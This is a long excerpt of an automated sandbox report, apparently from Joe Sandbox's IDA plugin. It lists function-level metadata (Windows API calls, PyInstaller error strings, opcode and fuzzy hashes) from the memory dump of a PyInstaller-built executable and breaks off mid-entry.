                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                          • Opcode ID: 1922c43916b7ae2b1956b00aa5dfceaf9999fbe18ebc65017c42f663bf9222a2
                                                                                                                                          • Instruction ID: 2bebc5c64d5406f67440383333f1225a299cebe505ad375f58ae0790524d4958
                                                                                                                                          • Opcode Fuzzy Hash: 1922c43916b7ae2b1956b00aa5dfceaf9999fbe18ebc65017c42f663bf9222a2
                                                                                                                                          • Instruction Fuzzy Hash: 40B2D172E18A828BE7648E64D4407FDB7A1FB46BA8F505135DA0997E84EF7DF900CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(00000000,00007FF61D322A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D328597
                                                                                                                                          • FormatMessageW.KERNEL32 ref: 00007FF61D3285C6
                                                                                                                                          • WideCharToMultiByte.KERNEL32 ref: 00007FF61D32861C
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                          • API String ID: 2920928814-2573406579
                                                                                                                                          • Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                                                                                          • Instruction ID: 950e3cb4e8954a5df18ebcbef52612f0a32cf8e568a2bde8c75857aaa9fd84e6
                                                                                                                                          • Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                                                                                          • Instruction Fuzzy Hash: EB212F71B18E4282F7649F25F85427AA365FF8ABA8F840135E64DC26A4FF3CE545C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                          • Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                                                                                          • Instruction ID: cc9518ad2db58d9a5173ef12df5d49bee1b60dff053d14e4ccd2517a0278628c
                                                                                                                                          • Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                                                                                          • Instruction Fuzzy Hash: 11316172A08F818AEB649F64E8403EDB364FB85B58F44443ADA4D87B94EF3CD648C714
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                          • Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                                                                                          • Instruction ID: 06067ddd01f48312da6e246b1ba9d37d807b81d90f814d7e0978b0ef8c2da977
                                                                                                                                          • Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                                                                                          • Instruction Fuzzy Hash: 04318636A08F8185DB64CF25E8442AEB3A4FB85BA4F540135EA9D83B54EF3CD545CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                          • Opcode ID: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
                                                                                                                                          • Instruction ID: 2af7bc1244094f3dc3ab794542148399ba03a34e697067449feb1da2f1a64ff6
                                                                                                                                          • Opcode Fuzzy Hash: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
                                                                                                                                          • Instruction Fuzzy Hash: ECB1B136B18E9681EA64DB2299502B9E3A1EB46FF4F444131EE5E97B85FF3DE441C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                          • Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                                                                          • Instruction ID: 9a7fd946edad202f47d57821187506664df0a854e61f75445afbcba176426802
                                                                                                                                          • Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                                                                          • Instruction Fuzzy Hash: 7B112E36B14F058AEB00CF61E8542B973A4FB1AB68F440E31DA6D877A4EF7CD1948390
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: memcpy_s
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                          • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                          • Instruction ID: 63b8da40aae693d833f692001b3581db735b0227edf4616f27166777d446daae
                                                                                                                                          • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                          • Instruction Fuzzy Hash: BDC10672B18AC687EB24CF19A04466AF791F785B94F458135DB4E83B84EF7EE801CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                          • Opcode ID: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
                                                                                                                                          • Instruction ID: 8acb2a48984cdb524cbb1c4b1397f3c071929456e2842067181dea81ce80db8e
                                                                                                                                          • Opcode Fuzzy Hash: 9ceb1b6cde6f3b2eda1c2fc70bd7e1e7d126a653b4f6510e73c9dfb920cedcd9
                                                                                                                                          • Instruction Fuzzy Hash: 8BB14973604B898AEB15CF29C846369BBA0F785F9CF148921DA5D837A4DF3ED452C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                          • Opcode ID: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
                                                                                                                                          • Instruction ID: 5aae319bc29ed471ec6ea4bc00f222db940c65af5678c052e6f8dce13b135d28
                                                                                                                                          • Opcode Fuzzy Hash: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
                                                                                                                                          • Instruction Fuzzy Hash: 54F0A472A19A8186F7608F70E849766F350EB45B38F004739E66D42AD4EF7CD008CA40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $
                                                                                                                                          • API String ID: 0-227171996
                                                                                                                                          • Opcode ID: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
                                                                                                                                          • Instruction ID: 128b7f3edceacd2a28164f8ef3ba38163bbcd61bc7965511c0d3d13d50b34245
                                                                                                                                          • Opcode Fuzzy Hash: c4872f1e0598d0dbbdaab36ff9640d642bec52225eb732dc17c9982f250c6bea
                                                                                                                                          • Instruction Fuzzy Hash: 00E1C936A09E4692EB68CF19825013DB3A0FF46F64F149235DA4E87794EF3EE851C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                          • API String ID: 0-3030954782
                                                                                                                                          • Opcode ID: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
                                                                                                                                          • Instruction ID: 2cea21f0e85c70b7f7a0dfa87c64f7626dbe0234d6a4d5162afdfaaf23348c5a
                                                                                                                                          • Opcode Fuzzy Hash: dcea56467776434e5e52420c9f77f7819282e5f197dea1188040280776680b59
                                                                                                                                          • Instruction Fuzzy Hash: 0A515876B18AC556E724CE359A00769FB91E746FA4F488331CBAC87AC5EF7DD0458700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: gfffffff
                                                                                                                                          • API String ID: 0-1523873471
                                                                                                                                          • Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                          • Instruction ID: 202e55121f6b6f71b628687e5ac126848827e35878876613be7b7e6cf70b45be
                                                                                                                                          • Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                          • Instruction Fuzzy Hash: 8EA14672B0CBC686EB25CF25A5007ADBB91AB56BE4F048231DE8D97781EE3DE501C711
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: TMP
                                                                                                                                          • API String ID: 3215553584-3125297090
                                                                                                                                          • Opcode ID: 364e340d20faf9de50e8717f3b14510ebffb82d301b74fd18d9a9a78a8f11498
                                                                                                                                          • Instruction ID: 0a86e3671ccb38f1df805af8f683f82d3e241f480723304e627f601d0effc941
                                                                                                                                          • Opcode Fuzzy Hash: 364e340d20faf9de50e8717f3b14510ebffb82d301b74fd18d9a9a78a8f11498
                                                                                                                                          • Instruction Fuzzy Hash: 9F518131F08E4262FA64EB269B115BAD691AF46FE4F084535DE0ECB7D5FE3DE4028200
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HeapProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                          • Opcode ID: 7569e3696a4862237eb2d75a5d3254d27d2728382b8d3a4fb7a9071d2e6cb06f
                                                                                                                                          • Instruction ID: 8cc494b2f468c5a63ec0e741c67bfadf119aa67ce9691d8decaeaed350d41166
                                                                                                                                          • Opcode Fuzzy Hash: 7569e3696a4862237eb2d75a5d3254d27d2728382b8d3a4fb7a9071d2e6cb06f
                                                                                                                                          • Instruction Fuzzy Hash: A8B09230E07E86C2EB482B21AC8621862A47F4AB20F944038C10D81320EE2D21B5DB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
                                                                                                                                          • Instruction ID: 4b5fedb9e4917b02b3344cbca351ee8e86c5088ca2f3efd459bf8c6bc7d8bf58
                                                                                                                                          • Opcode Fuzzy Hash: e1b45cc5b539c2f4a44f5a431b63c23698d5cd8cc6c74fd81da4f2666c4fe2f5
                                                                                                                                          • Instruction Fuzzy Hash: E1D1C536A08E46A6EB68CE29825027DA7A0EF07F68F149235CE4D877D5EF3DD855C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
                                                                                                                                          • Instruction ID: c4821d1a6a98b8163f2bd03087244a1884e06f6f24dbe14b954c7fb1146cbc44
                                                                                                                                          • Opcode Fuzzy Hash: 84ec6a3f320757ef13b53a77f9400a9296092c401b576f7c6112a1c9e532824b
                                                                                                                                          • Instruction Fuzzy Hash: 19C1D3726141E04BD2C9EB29E45957E73E1F78934DBD4803AEB8B47B89CA3CE418D760
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4004e6f7831e6380f0c7a9c187e4f56c2fba6a50471e57e5591c0e9cd6f9eb67
